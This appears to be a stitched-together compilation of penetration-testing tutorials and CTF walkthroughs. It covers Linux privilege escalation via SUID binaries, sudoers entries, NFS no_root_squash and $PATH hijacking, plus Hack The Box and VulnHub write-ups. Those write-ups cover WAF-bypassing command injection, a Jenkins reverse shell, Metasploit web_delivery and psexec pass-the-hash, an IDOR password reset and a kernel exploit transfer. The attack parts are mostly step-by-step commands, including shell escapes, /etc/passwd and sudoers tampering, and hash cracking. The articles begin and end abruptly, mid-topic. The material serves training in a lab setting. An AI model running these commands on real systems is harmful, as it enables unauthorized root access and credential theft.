Similarly, we can escalate root privilege if SUID bit is ON for find command. For example, suppose you (system admin) want to give SUID permission for Find command. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which find

ls -al /usr/bin/find

chmod u+s /usr/bin/find

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for find command which means we can execute any command within find command. To do so first we create an empty file “raj” and then run whoami command as shown below.

touch raj

find raj -exec “whoami” \;

If an attacker successfully enumerated SUID bit for /usr/bin/find then it will allow him to execute any malicious command such netcat bin/bash shell or may fetch important system information for privilege escalation.

Privilege Escalation by Using Vim

Similarly, we can escalate root privilege if SUID bit is ON for Vim editor. For example, suppose you (system admin) want to give SUID permission for Vim editor. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim

ls -al /usr/bin/vim

ls -al /usr/bin/alternatives/vim

chmod u+s /usr/bin/vim.basic

You will found vim.basic through symlinking as shown in the below image.

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries who's having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /usr/bin/vim.basic and hence now we can edit any file which through vim that can be editable only by sudo or root user.

As we know ignite is non-root user who has least permissions, since vim has SUID permission, therefore, we can edit the sudoers file through it and can change permissions for user “ignite”. So we open sudoers file by typing visudo commandand give all permission to user “ignite” as shown in the image.

ignite ALL=(ALL:ALL) ALL

Now let access root directory as shown in below image.

sudo -l

sudo bash

Great!! This trick also work superbly for privilege escalations.

Privilege Escalation by Running Script

There are maximum chances to get any kind of script for the system or program call, it can be any script either PHP, Python or C language script. Suppose you (system admin) want to give SUID permission to a C language script which will provide bash shell on execution.

So here we have coded a c program which will call system for bash shell and saved it as “asroot.c”.

Then create a rootshell directory inside /bin directory and copied the asroot.c file in rootshell directory then run gcc compiler for compilation.

mkdir /bin/rootshell

cd /bin/rootshell

cp /home/raj/Desktop/asroot.c .

gcc asroot.c -o shell

chmod u+s shell

ls -al shell

Now again compromise target’s system and use find command to identify binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for so many binary files but we are interested in /bin/rootshell/shell. So we move into /bin/rootshell directory and run the script “shell” as result we get root access as shown below.

cd /bin/rootshell

./shell

Thus we saw how we can escalate root privilege if SUID bit is enabled for any script, although it is not possible to get such script which calls bash shell but if you found any script with SUID permission then using above techniques you can modify the content of that script to get the bash shell.

Privilege Escalation by Using Nano

Similarly, we can escalate root privilege if SUID bit is ON for nano editor. For example, suppose you (system admin) want to give SUID permission for nano editor. Then you may follow below steps to identify its location and current permission after then you can enable SUID bit by changing permission.

which vim

ls -al /bin/nano

chmod u+s /bin/nano

Again compromise the target system and then move for privilege escalation phase as done above. Then by using the following command you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

So here we came to know that SUID bit is enabled for /bin/nano and now let’s open /etc/passwd file to edit own user as done above by using openssl passwd.

On other hands I have generated a new encrypted password: 123 using openssl passwd

Now open passwd file with nano editor and add your own user as done above. Here you can observe I have created demo user with encrypted password in victim’s system.

nano /etc/password

Since we have added our own user with root privileges let’s get into root directory.

su demo

2^nd Method

If suid bit is enabled for /bin/nano then we can steal the password from inside /etc/shadow file. So after compromising target’s machine we had opened shadow file in nano editor and copy the encrypted password set for user: raj.

Now paste above copy code into a text file and saved as hash on the desktop, after then used john the ripper to decode it as shown below. It has given raj: 123 as password, now try to login into target's system through raj account.

So Today we have demonstrated how the SUID permission can lead to privilege escalation even if it is allow to a normal copy, cat, nano, vim and so commands and programs.

Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Fluxcapacitor of Hack The Box. Solving this lab is not much easy, all you need is your web penetration testing skill to solve this challenge. This lab is designed to bypass Web Application Firewall (WAF) for exploiting OS command injection vulnerability in this machine.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online, therefore, they have a static IP. Fluxcapacitor has IP: 10.10.10.69.

As we knew the initial stage is enumeration; therefore use nmap version scan for gathering target’s machine and running services information.

nmap -sV 10.10.10.69

So from its scanning result, it told us that port 80 is open for web services and also protected by web application firewall “superWAF” thus we explored target IP in the web browser but found nothing interesting.

Then we look into its source code and saw an exciting comment which was pointing towards URL: /sync, and without wasting time we open /sync in URL.

LOL!!! It gave 403 forbidden error message and something openresty/1.13.6.1 then we looked into Google for any exploit related to this but failed to find any working exploit against it.

At the moment, we decided to use burp suite for intercepting our browser request. So after intercepting the Http request, the raw information is sent to the repeater.

Huhhhh!! It was responding same output as was in the web browser. Might be there would be some chances of WAF filter restriction on User-Agent such as Mozilla Firefox/5.0.

So we start scrutiny for User-Agent field by replacing original user-agent content from “raj” randomly. Finally!!! It gave current timestamp as disclosed in the comment found in the source code of the home page.

Now it was confirmed that there was SuperWAF filter against the user-agent field, therefore, we try to search its exploit in Google but we didn't find any particular exploit. Nevertheless, Google gave a little hint for OS command injection and on the bases of that, we try few parameters within Http Header such as /sync?test=ls which response with the same timestamp every time. Hence we need to fuzz proper directory, therefore, we will use wfuzz in our next step.

So we use common.txt wordlist for URL brute force and execute below command.

wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19

It gave 403 response for payload “opt”; let’s try to opt after/sync and identify the response.

Now use ‘opt’ parameter to bypass WAF and execute ls command through it, HOWEVER again there is a trick to execute ls command. Because WAF will not allow you to perform OS command injection directly, therefore, it will be a little bit tougher to exploit it. But THANKS to medium.com, because I got the idea to bypass WAF for exploiting OS command injection which is known as string literal concatenation from this website, meaning that adjacent string literals are concatenated, without any operator.

We took help from that website which I have mentioned above and execute three commands: whoami, id, uname through curl as shown in image.

curl http://10.10.10.69/sync?opt=' whoami'

curl "http://10.10.10.69/sync?opt=' id'"

curl http://10.10.10.69/sync?opt=' u'n'ame -a'

Superb!! It was great to know that we have bypassed WAF successfully, but still the task is not completed yet.

Let’s seize the user.txt and root.txt file and finished this task. Hhhhhh!!!! Believe me, still, it is not easy to bypass WAF even if your goal is near. Seriously we put great efforts and at last found user.txt when executed below commands.

curl "http://10.10.10.69/sync?opt=' l's' /home'"

curl http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'

curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"

Now the goal was root.txt file and taking a lesson from the previous experience I choose to run sudo -l command to check the sudo privileges of the current user.

curl http://10.10.10.69/sync?opt=' sudo -l'

Awesome!! It told us that we can run a script “monit” with root privileges without using password, which is inside /home/themiddle/ directory. Let’s open it with the help of cat command.

curl http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''

After reading .monit file, we concluded that the script takes two parameter i.e. cmd string and base64 decoding which will match the conditions according to it and passes the final result to bash -c as parameter.

Hence it was clear that 1st parameter will match string “cmd” and 2nd will decode base64 value for that reason first we generated base64 value for /root/root.txt because we were well aware of the location of the root.txt file from our previous challenges.

echo "cat /root/root.txt" | base64

Now with the help of sudo privilege execute the command to gain root access and complete the task by grabbing root.txt

curl http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='

HURRAYYYY!!! We hit the goal and successfully found the root.txt file.

Hello friends! Today we are going to take another CTF challenge known as Trollcave. The credit for making this vm machine goes to “David Yates” and it is another boot to root challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM from here.

Let’s Breach!!!

Let's start with getting to know the IP of VM (Here, I have it at 192.168.1.124 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -A 192.168.1.124

Awesome!! Nmap has dumped the details of services running on open port 22 and 80.

Knowing port 80 is open in victim's network I preferred to explore his IP in a browser. At first glance, we saw three tabs Home, login and Register.

Then we scroll down the page and look at Ruby gem and found that this site is based on Ruby on rails. And on the right side we saw two categories i.e. 0nline users and Newest users, when we click on “xer” a new web page gets opened.

From its URL we perceived that user xer has user ID 17 and hence there must be any user between user ID 1 to 17.

So we manually replace id 17 from id 1 and found King’s page which was for superadmin account.

At its home page we read the post password reset by coderguy, represented by ruby gem for rail password reset and from Google we found default directory for password reset for reset. So we explored http://192.168.1.124/password_resets/new and obtained password reset form. Very first we try to reset superadmin password but unfortunately get failed, BUT successfully got the link for xer password reset.

Yeah!! It was Pretty Good to see a link for xer password reset, then we have copied that link.

http://192.168.1.124/password_resets/edit.dphWuziPVk6ELBIQ0P-poQ?name=xer

And past the copied link in URL, then swap name=xer from king as given below, later entered a new password for superadmin (king), it is known as IDOR.

http://192.168.1.124/password_resets/edit.dphWuziPVk6ELBIQ0P-poQ?name=king

Well!!! On executing URL; it gives a message “password reset successfully” and then we logged in superadmin account.

Yippee!!! Finally, we logged in as superadmin and access admin console, we saw many tabs and apparently click on file manager.

Here we saw enable file upload option, and we enabled it so that we can upload any backdoor whenever we need to upload that.

Thus we start from uploading PHP backdoor but failed to upload, similarly, we tried so many backdoors such as ruby, C shell and many more but get failed each time. After so many attempts we successfully upload ssh RSA file.

To do so follow the below steps:

ssh-keygen -f rails

mv rails.pub authorized_keys

chmod 600 rails

Here we have generated ssh RSA key file by the name of rails without a password and transferred rails.pub into authorized_keys and gave permission 600 for proper authentication.

Then upload the authorized_keysand add ../../../../../../home/rails/.ssh/authorized_keyspath manually.

So after uploading SSH key, it was time to connect target’s machine through ssh key.

ssh -i rails rails@192.168.1.124

Awesome!! From below image, you can observe the target machine's tty shell.

Then we execute lsb_release -a command to know the version of the kernel and found 16.04. After then with the help of searchsploit found kernel exploit 44298.c for local privilege escalation.

At that moment we copied this exploit on Desktop and compiled it, now it was impossible to transfer the exploit using simple complied file, therefore, we need to encode it file into base64. You use below command to follow same steps.

cd Desktop

cp /usr/share/exploitdb/exploits/linux/local/44298.c .

gcc 44298.c -o kernel

base64 kernel

We copied the base64 encoded value then movie into target’s terminal where we created an empty file exploit.base64 with the help of nano and past above copied encode code.

nano exploit.base64

Far ahead decoded it in a new file as rootshell and give all permission to the decoded file. At last, we run the rootshell file to get root privilege.

cat exploit.base64 |base64 -d > rootshell

chmod u+x rootshell

./rootshell

cd /root

cat flag.txt

BINGO!!!! We got the root flag!!!

Hello Friends!! Today we are going to solve another CTF Challenge “Jeeves”. This VM is also developed by Hack the Box, Jeeves is a Retired Lab and there are multiple ways to breach into this VM. In this lab, we have escalated root privilege in 3 different ways and for completing the challenge of this VM we took help from Tally(Hack the box).

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, therefore, they have a static IP. Jeeves Lab has IP: 10.10.10.63.

Now, as always let’s begin our hacking with the port enumeration.

nmap -A 10.10.10.63

Looking around its result we found ports 22, 80, 135, 445 and 50000 are open, and moreover, port 135 and 445 was pointing towards Windows operating system.

Subsequently, first we checked web service and explored target IP in a web browser and it was put up by “Ask Jeeves search engine” webpage. So we try to search some website such as google.com and a new web page represented by the fake error page come up in front of us.

On port 50000 in a Web browser give us to HTTP 404 Error page.

Then we decide to use OWASP Dirbuster for directory brute force attack.

From its result, we found so many directories but we drive with /askjeeves for further process.

So when we had explored 10.10.10.63:50000/askjeevesit lead us to “Jenkins Dashboard”. Ahhh!! It was WOW moment for us because we knew that there are so many methods to exploit Jenkins. Thus we move inside "Manage Jenkins" options as it was the spine and abusing it was quite soothing.

There were so many options but we were interested in Script Consolebecause Jenkins has very nice Groovy script console that allows someone to execute arbitrary Groovy scripts within the Jenkins master runtime.

We found Java reverse shell from GitHub, so we copied the code and modified its localhost and port as per our specification.

Then we start Netcat listener and run above Groovy Script to access victim's reverse connection. From below image, you can observe that we access tty shell of victim’s machine.

As we love meterpreter shell therefore we load metasploit framework and execute below commands.

use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) > set target 2

msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28

msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28

msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for powershell.exe and Paste it inside CMD shell as shown in next image.

Paste above malicious code here in netcat.

You will get meterpreter session of victim’s machine in your Metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:

getuid

But currently we don’t have NT AUTHORITY\SYSTEM permission. But we knew the techniques that we have used in Tally CTF for gaining NT AUTHORITY\SYSTEM permission.

Therefore taking help from our previous article “Tally” we executed below commands and successfully gained NT AUTHORITY\SYSTEM permission

upload/root/Desktop/RottenPotato/rottenpotato.exe.

load incognito

execute -Hc -f rottenpotato.exe

impersonate_token "NT AUTHORITY\\SYSTEM"

getuid

Let me tell you this, that we have solved so many CTF challenges of Hack the Box among them some was framed using Windows Operating system and we always grabbed the user.txt file from inside some a folder that owned by any username and root.txt form inside Administrator folder and both these folders are present inside C:\Users

Similarly, you can observe the same thing here also and might be you got my intention of above said words. So let’s grab user.txt file first from inside /kohsuke/Desktop.

COOL!!! We have captured the 1^st flag.

Then we go for root.txt file, BUT it was a little bit tricky to get the root.txt file. Because the author has hide root.txt file by using some ADS technique (Windows Alternate Data Streams) and to grab that file, you can execute below commands.

cd Administrator

cd Desktop

ls-al

cat hm.txt

dir /R

more < hm.txt:root.txt

Hurray!! R flag with dir command discloses root.txt file and We successfully completed the 2^nd task.

2^nd Method

When you have fresh meterpreter session 1 then move into /document directory and download CEH.kdbx file. Here also we took help from our previous article TALLY.

Now run the python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.

python keepass2john.py CEH.kdbx > passkey

Next, we have used John the ripper for decrypting the content of “passkey” with help of the following command.

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt passkey

so we found the master key "moonshine1" for keepass2which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command.

apt-get install keepass2 -y

After installing, run the below command and submit “moonshine1” in the field of the master key.

keepass2 tim.kdbx

Inside CEH we found so many credential, we copied all password from here and past into a text file and got few password and one NTLM hash value:aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

use exploit/windows/smb/psexec

msf exploit(windows/smb/psexec) > set rhost 10.10.10.63

msf exploit(windows/smb/psexec) > set smbuser administrator

msf exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

msf exploit(windows/smb/psexec) > set lport 8888

msf exploit(windows/smb/psexec) > exploit

Awesome!!! We have meterpreter session 2 with proper NT AUTHORITY\SYSTEM permission, now use above steps to get the root.txt file.

Note: we have rebooted the target’s VM before starting 2^nd method.

At the time when you have fresh meterpreter session2 (via psexec) then execute the following command to enable remote desktop service in victim's machine.

run getgui -e

shell

Now we have victim’s command prompt with administrator privilege thus we can change User administrator password directly by using net user command.

net user administrator 123

Now open a new terminal in your Kali Linux and type rdesktop 10.10.10.63 command to access remote desktop services of victim’s machine and after that submit credential administrator: 123 for login.

BOOOOOM!!! Look at the screen of our victim, now let’s grab the root flag and enjoy this GUI mode.

Finding user.txt is quite easy you can try by your own. To grab root.txt flag open the CMD prompt and type following command ad done above.

dir /R

more < hm.txt:root.txt

Enjoy Hacking!!!!

In our previous articles, we have discussed Linux Privilege Escalation using SUID Binaries and /etc/passwdfile and today we are posting another method of "Linux privilege Escalation using Sudoers file”. While solving CTF challenges, for privilege escalation we always check root permissions for any user to execute any file or command by executing sudo -l command. You can read our previous article where we had applied this trick for privilege escalation.

Let’s Start with Theoretical Concept!!

In Linux/Unix, a sudoers file inside /etc is the configuration file for sudo rights. We all know the power of sudo command, the word sudo represent Super User Do root privilege task. Sudoers file is that file where the users and groups with root privileges are stored to run some or all commands as root or another user. Take a look at the following image.

When you run any command along with sudo, it needs root privileges for execution, Linux checks that particular username within the sudoers file. And it concluded, that the particular username is in the list of sudoers file or not, if not then you cannot run the command or program using sudo command.As per sudo rights the root user can execute from ALL terminals, acting as ALL users: ALL group, and run ALL command.

Sudoer File Syntax

If you (root user) wish to grant sudo right to any particular user then type visudo command which will open the sudoers file for editing. Under “user privilege specification” you will observe default root permission “root ALL=(ALL:ALL) ALL" BUT in actual, there is Tag option also available which is optional, as explained below in the following image.

Consider the given example where we want to assign sudo rights for user:raaz to access the terminal and run copy command with root privilege. Here NOPASSWD tag that means no password will be requested for the user.

NOTE:

1. (ALL:ALL) can also represent as (ALL)

2. If you found (root) in place of (ALL:ALL) then it denotes that user can run the command as root.

3. If nothing is mention for user/group then it means sudo defaults to the root user.

Let’s Begin!!

Let’s get into deep through practical work. First, create a user which should be not the sudo group user. Here we have added user “raaz” who’s UID is 1002 and GID is 1002 and hence raaz is non-root user.

Traditional Method to assign Root Privilege

If system administrator wants to give ALL permission to user raaz then he can follow below steps to add user raaz under User Privilege Specification category.

visudo

raaz ALL=(ALL:ALL) ALL

raaz ALL=(ALL) ALL

Spawn Root Access

On other hands start yours attacking machine and first compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh and want to know sudo rights for the current user then execute below command.

sudo -l

In the traditional method, PASSWD option is enabled for user authentication while executing above command and it can be disabled by using NOPASSWD tag. The highlighted text is indicating that current user is authorized to execute all command. Therefore we have obtained root access by executing the command.

sudo su

Default Method to assign Root Privilege

If system administrator wants to give root permission to user raaz to execute all command and program then he can follow below steps to add user raaz under User Privilege Specification category.

visudo

raaz ALL=ALL

raaz ALL=(root) ALL

Here also Default PASSWD option is enabled for user authentication.

Spawn Root Access

Again compromise the target system and then move for privilege escalation stage as done above and execute below command to view sudo user list.

suod -l

Here you can perceive the highlighted text which is representative that the user raaz can run all command as root user. Therefore we can achieve root access by performing further down steps.

sudo su

sudo bash

Note: Above both methods will ask user’s password for authentication at the time of execution of sudo -l command because by Default PASSWD option is enabled.

Allow Root Privilege to Binary commands

Sometimes the user has the authorization to execute any file or command of a particular directory such as /bin/cp, /bin/cat or /usr/bin/ find, this type of permission lead to privilege escalation for root access and it can be implemented with help of following steps.

raaz ALL=(root) NOPASSWD: /usr/bin/find

NOTE: Here NOPASSWD tag that means no password will be requested for the user while running sudo -l command.

Spawn Root Access using Find Command

Again compromised the Victim’s system and then move for privilege escalation phase and execute below command to view sudo user list.

suod -l

At this point, you can notice the highlighted text is indicating that the user raaz can run any command through find command. Therefore we got root access by executing below commands.

sudo find /home -exec /bin/bash \;

Allow Root Privilege to Binary Programs

Sometimes admin assigns delicate authorities to a particular user to run binary programs which allow a user to edit any system files such as /etc/passwd and so on. There are certain binary programs which can lead to privilege escalation if authorized to a user. In given below command we have assign sudo rights to the following program which can be run as root user.

raaz ALL= (root) NOPASSWD: usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk, /usr/bin/man, /usr/bin/vi

Spawn shell using Perl one-liner

At the time of privilege, escalation phase executes below command to view sudo user list.

suod -l

Now you can observe the highlighted text is showing that the user raaz can run Perl language program or script as root user. Therefore we got root access by executing Perl one-liner.

perl -e 'exec "/bin/bash";'

Spawn shell using Python one-liner

After compromising the target system and then move for privilege escalation phase as done above and execute below command to view sudo user list.

suod -l

At this point, you can perceive the highlighted text is indicating that the user raaz can run Python language program or script as root user. Thus we acquired root access by executing Python one-liner.

python -c 'import pty;pty.spawn("/bin/bash")'

Spawn shell using Less Command

For the privilege, escalation phase executes below command to view sudo user list.

suod -l

Here you can observe the highlighted text which is indicating that the user raaz can run less command as root user. Hence we obtained root access by executing following.

sudo less /etc/hosts

It will open requested system file for editing, BUT for spawning root shell type !bash as shown below and hit enter.

You will get root access as shown in the below image.

Spawn shell using AWK one-liner

After compromise, the target system then moves for privilege escalation phase as done above and execute below command to view sudo user list.

suod -l

At this phase, you can notice the highlighted text is representing that the user raaz can run AWK language program or script as root user. Therefore we obtained root access by executing AWK one-liner.

sudo awk 'BEGIN {system("/bin/bash")}'

Spawn shell using Man Command (Manual page)

For privilege escalation and execute below command to view sudo user list.

suod -l

Here you can observe the highlighted text is indicating that the user raaz can run man command as root user. Therefore we got root access by executing following.

sudo man man

It will be displaying Linux manual pages for editing, BUT for spawning root shell type !bashas presented below and hit enter, you get root access as done above using Less command.

Spawn shell using Vi-editor (Visual editor)

After compromising the target system and then move for privilege escalation phase as done above and execute below command to view sudo user list.

suod -l

Here you can observe the highlighted text which is indicating that user raaz can run vi command as root user. Consequently, we got root access by executing following.

sudo vi

Thus, It will open vi editors for editing, BUT for spawning root shell type !bash as shown below and hit enter, you get root access as done above using Less command.

You will get root access as shown in the below image.

whoami

NOTE: sudo permission for less, nano, man, vi and man is very dangerous as they allow user to edit system file and lead to Privilege Escalation.

Allow Root Privilege to Shell Script

There are maximum chances to get any kind of script for the system or program call, it can be any script either Bash, PHP, Python or C language script. Suppose you (system admin) want to give sudo permission to any script which will provide bash shell on execution.

For example, we have some scripts which will provide root terminal on execution, in given below image you can observe that we have written 3 programs for obtaining bash shell by using different programing language and saved all three files: asroot.py, asroot.sh, asroot.c (compiled file shell) inside bin/script.

NOTE: While solving OSCP challenges you will find that some script is hidden by the author for exploit kernel or for root shell and set sudo permission to any particular user to execute that script.

Now allow raaz to run all above script as root user by editing sudoers file with the help of following command.

raaz ALL= (root) NOPASSWD: /bin/script/asroot.sh, /bin/script/asroot.py, /bin/script/shell

Spawn root shell by Executing Bash script

For the privilege, escalation phase executes below command to view sudo user list.

suod -l

The highlighted text is indicating that the user raaz can run asroot.sh as root user. Therefore we got root access by running asroot.sh script.

sudo /bin/script/asroot.sh

Spawn root shell by Executing Python script

Execute below command for privilege escalation to view sudo user list.

suod -l

At this time the highlighted text is showing that user raaz can run asroot.py as root user. Therefore we acquired root access by executing following script.

sudo /bin/script/asroot.py

Spawn root shell by Executing C Language script

After compromising the target system and then move for privilege escalation and execute below command to view sudo user list.

suod -l

Here you can perceive the highlighted text is indicating that the user raaz can run shell (asroot.c complied file) as root user. So we obtained root access by executing following shell.

sudo /bin/script/shell

Today we have demonstrated the various method to spawn root terminal of victim’s machine if any user is a member of sudoers file and has root permission.

HAPPY HACKING!!!!

Table of contents

Introduction of NFS

Misconfigured NFS Lab setup

Scanning NFS shares

· Nmap script

· showmount

Exploiting NFS server for Privilege Escalation via:

Bash file

C program file

Nano/vi

· Obtain shadow file

· Obtain passwd file

· Obtain sudoers file

Let’s Start!!

Network File System (NFS): Network File System permits a user on a client machine to mount the shared files or directories over a network. NFS uses Remote Procedure Calls (RPC) to route requests between clients and servers. Although NFS uses TCP/UDP port 2049 for sharing any files/directories over a network.

Misconfigured NFS Lab setup

Basically, there are three core configuration files (/etc/exports, /etc/hosts.allow, and /etc/hosts.deny) you will need to configure to set up an NFS server. BUT to configure weak NFS server we will look only /etc/export file.

To install NFSservice execute below command in your terminal and open /etc/export file for configuration.

sudo apt-get update

sudo apt install nfs-kernel-server

nano /etc/exports

The /etc/exports file holds a record for each directory that you expect to share within a network machine. Each record describes how one directory or file is shared.

Apply basic syntax for configuration:

Directory Host-IP(Option-list)

There are various options will define which type of Privilege that machine will have over shared directory.

· rw : Permit clients to read as well as write access to shared directory.

· ro : Permit clients to Read-only access to shared directory..

· root_squash:This option Prevents file request made by user root on the client machine because NFS shares change the root user to the nfsnobody user, which is an unprivileged user account.

· no_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implication.

· async: It will speed up transfers but can cause data corruption as NFS server doesn’t wait for the complete write operation to be finished on the stable storage, before replying to the client.

· sync: The sync option does the inverse of async option where the NFS server will reply to the client only after the data is finally written to the stable storage.

Hopefully, it might be clear to you, how to configure the /etc/export file by using a particular option. An NFS system is considered weak or Misconfigured when following entry/record is edit into it for sharing any directory.

/home *(rw,no_root_squash)

Above entry shows that we have shared /home directory and allowed the root user on the client to access files to read/ write operation and * sign denotes connection from any Host machine. After then restart the service with help of the following command.

sudo /etc/init.d/nfs-kernel-server restart

Scanning NFS shares

Nmap

You can take help of Nmap script to scan NFS service in target network because it reveals the name of share directory of target’s system if port 2049 is opened.

nmap -sV --script=nfs-showmount 192.168.1.102

Basically nmap exports showmount -e command to identify the shared directory and here we can clearly observe /home * is shared directory for everyone in the network.

Showmount

The same thing can be done manually by using showmount command but for that install nfs-common package on your local machine with help of the following command.

apt-get install nfs-common

showmount -e 192.168.1.102

Exploiting NFS server for Privilege Escalation

Bash file

Now execute below command on your local machine to exploit NFS server for root privilege.

mkdir /tmp/raj

mount -t nfs 192.168.1.102:/home /tmp/raj

cp /bin/bash .

chmod +s bash

ls -la bash

Above command will create a new folder raj inside /tmp and mount shared directory /home inside /tmp/raj. Then upload a local exploit to gain root by copying bin/bash and set suid permission.

Use df -hcommand to get summary ofthe amount of free disk space on each mounted disk.

First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Now we knew that /home is shared directory, therefore, move inside it and follow below steps to get root access of victim's machine.

cd /home

./bash -p

whoami

So, it was the first method to pwn the root access with help of bin/bash if NFS system is configured weak.

C Program

Similarly, we can use C language program file for root privilege escalation. We have generated a C-Program file and copied it into /tmp/raj folder. Since it is c program file therefore first we need to compile it and then set suid permission as done above.

cp asroot.c /tmp/root

cd /tmp/raj

gcc asroot.c -o shell

chmod +s shell

Now repeat the above process and run shell file to obtained root access.

cd /home

./shell

whoami

So, it was the second method to pwn the root access with help of bin/bash via c-program if NFS system is misconfigured.

Nano/Vi

Nano and vi editor both are most dangerous applications that can lead to privilege escalation if share directly or indirectly. In our case, it not shared directly but still, we can use any application for exploiting root access.

Follow below steps:

cp /bin/nano

chmod 4777 nano

ls -la nano

Since we have set suid permission to nano therefore after compromising target's machine at least once we can escalate root privilege through various techniques.

Shadow File

cd /home

./nano -p etc/shadow

When you will execute above command it will open shadow file, from where you can copy the hash password of any user.

Here I have copied hash password of the user: raj in a text file and saved as shadow then use john the ripper to crack that hash password.

Awesome!!! It tells raj having password 123. Now either you can login as raj and verify its privilege or follow next step.

Passwd file

Now we know the password of raj user but we are not sure that raj has root privilege or not, therefore, we can add raj into the root group by editing etc/passwd file.

Open the passwd file with help of nano and make following changes

./nano -p etc/passwd

raj:x:0:0:,,,:/home/raj:/bin/bash

Now use su command to switch user and enter the password found for raj.

su raj

whoami

Great!!! This was another way to get root access to target's machine.

Sudoers file

We can also escalate root privilege by editing sudoers file where we can assign ALL privilege to our non-root user (ignite).

Open the sudoers file with help of nano and make following changes

./nano -p etc/sudoers

ignite ALL=(ALL:ALL) NOPASSWD: ALL

Now use sudo bash command to access root terminal and get root privilege

sudo bash

whoami

Conclusion: Thus we saw the various approach to escalated root privilege if port 2049 is open for NFS services and server is weak configured. For your practice, you can play with ORCUS which is a vulnerable lab of vulnhub and read the article from here.

After solving several OSCP Challenges we decided to write the article on the various method used for Linux privilege escalation, that could be helpful for our readers in their penetration testing project. In this article, we will learn “various method to manipulate $PATH variable” to gain root access of a remote host machine and the techniques used by CTF challenges to generate $PATH vulnerability that lead to Privilege escalation. If you have solved CTF challenges for Post exploit then by reading this article you will realize the several loopholes that lead to privileges escalation.

Table of contents

Introduction

· What is PATH

· How to view PATH of remote machine

Operating Nullbyte CTF

· Ubuntu victim lab set-up

· Penetrating victim’s VM Machine

· Exploiting $PATH via:

· Echo command

· cp command

· symlinking

Operating Skuzzy CTF

· Ubuntu victim lab set-up

· Penetrating victim’s VM Machine

· Exploiting $PATH via:

· Echo command

Operating Lazy HTB

· Ubuntu victim lab set-up

· Penetrating victim’s VM Machine

· Exploiting $PATH via:

· Nano Editor

Operating PwnLab CTF

· Ubuntu victim lab set-up

· Penetrating victim’s VM Machine

· Exploiting $PATH via:

· Vi editor

Lets Start!!

Introduction

PATH is an environmental variable in Linux and Unix-like operating systems which specifies all bin and sbin directories where executable programs are stored. When the user run any command on the terminal, its request to the shell to search for executable files with help of PATH Variable in response to commands executed by a user. The superuser also usually has /sbin and /usr/sbin entries for easily executing system administration commands.

It is very simple to view Path of revelent of revelent user with help of echo command

echo $PATH

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

If you notice ‘.’ in your PATH it means that the logged user can execute binaries/scripts from the current directory and it can be an excellent technique for an attacker to escalate root privilege. This is due to lack of attention while writing program thus admindo not specify the full path to the program.

Operating Nullbyte CTF

Nullbyteis a CTF challenge hosted by vulnhub to sharpen your penetration skillset. When you will solve this challenge you will realize that for the privilege escalation you have manipulated environment PATH for ps command which is a system binary.

But here we are trying to enumerate the loophole that leads to privileges escalation and for that, we will set up our own local machine (Ubuntu) and try to configure approx. same vulnerability, therefore we request you go with the walkthrough of each lab mention in this article.

Ubuntu LAB SET_UP

Currently, we are in /home/raj directory where we will create a new directory with the name as /script. Now inside script directory, we will write a small c program to call a function of system binaries.

pwd

mkdir script

cd /script

nano demo.c

As you can observe in our demo.c file we are calling ps command which is system binaries.

After then compile the demo.c file using gcc and promote SUID permission to the compiled file.

gcc demo.c -o shell

chmod u+s shell

ls -la shell

Penetrating victim’s VM Machine

First, you need to compromise the target system and then move to privilege escalation phase. Suppose you successfully login into victim’s machine through ssh. Then without wasting your time search for the file having SUID or 4000 permission with help of Find command.

find / -perm -u=s -type f 2>/dev/null

Hence with help of above command, an attacker can enumerate any executable file, here we can also observe /home/raj/script/shell having suid permissions.

Then we move into /home/raj/script and saw an executable file “shell”. So we run this file, and here it looks like the file shell is trying to run ps and this is a genuine file inside /bin for Process status.

./shell

Echo command

cd /tmp

echo “/bin/sh” > ps

chmod 777 ps

echo $PATH

export PATH=/tmp:$PATH

cd /home/raj/script

./shell

whoami

Copy command

cd /home/raj/script/

cp /bin/sh /tmp/ps

echo $PATH

export PATH=/tmp:$PATH

./shell

whoami

Symlink command

ln -s /bin/sh ps

export PATH=.:$PATH

./shell

whoami

